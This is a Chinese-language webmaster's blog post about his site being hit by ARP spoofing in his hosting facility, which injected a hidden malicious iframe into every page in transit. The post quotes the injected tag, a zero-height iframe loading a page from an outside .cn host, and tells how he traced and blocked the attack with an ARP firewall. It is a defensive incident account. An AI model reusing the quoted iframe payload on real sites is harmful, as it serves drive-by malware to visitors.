昨天晚上11點多了。正要睡覺,突然一個網友電話過來了。說網頁吧出問題,被掛馬了。我一聽嚇了一大跳!馬上起床!
我進入網頁吧一訪問,真的掛馬了,全部網頁都有馬出現iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0>/iframe> ,然后馬上登陸服務器,看源代碼,暈了。沒有發現有掛馬的痕跡.為了怕影響網頁吧的用戶,先把網頁吧這個網站停了.
馬上問QQ上的幾個做服務器的高手朋友,發現全部網頁掛了個馬,但是我打開網頁看源文件卻沒有,怎么回事情?后來知道網頁里沒有 訪問有馬,說明機房內有ARP攻擊,裝 360安全衛士 有ARP防火墻 !
沒管了.馬上安裝360,一提示,果然是ARP攻擊,然后打開網頁吧訪問,郁悶.還是有木馬.馬上關閉.這里我要說一句,360的ARP簡直就是垃圾,基本沒用的。千萬別用。用和沒用是一樣的!不過查出了ARP攻擊的人的網卡地址.
然后半夜聯系機房,告訴他們APR攻擊的網卡,沒用.那機房的說是新技術,不會查IP.不懂,要明天.我超郁悶!
沒辦法自己繼續.繼續網上找軟件,找到了金山arp防火墻,需要的可以去網頁吧下。如果你也被攻擊的話。一安裝,然后打開.沒問題了。完全防御!最重要的是這個工具免費啊。
朋友總結:這個ARP攻擊 不是代碼的問題 是服務器輸出后,經過網關的時候被加了代碼 所以網頁里是沒有代碼的 是被別的機器冒充了網關 轉發修改了數據!
終于解決問題了,一看表凌晨2點30了.一起3個小時!驚心動魄啊!
如果站長你的站被掛馬了,而在源代碼里沒有發現木馬,你就應該懷疑是不是ARP攻擊了。最直接的辦法是告訴機房,要他們撥攻擊的人的線.第二個辦法就是安裝金山arp防火墻!
金山arp防火墻下載: http://www./ruanjian/anquan/200806/6616.html
(轉文章的朋友這個金山arp防火墻下載的連接別去掉了,因為很多人都需要這個軟件,第二我打字也不容易,算是給我點點流量吧)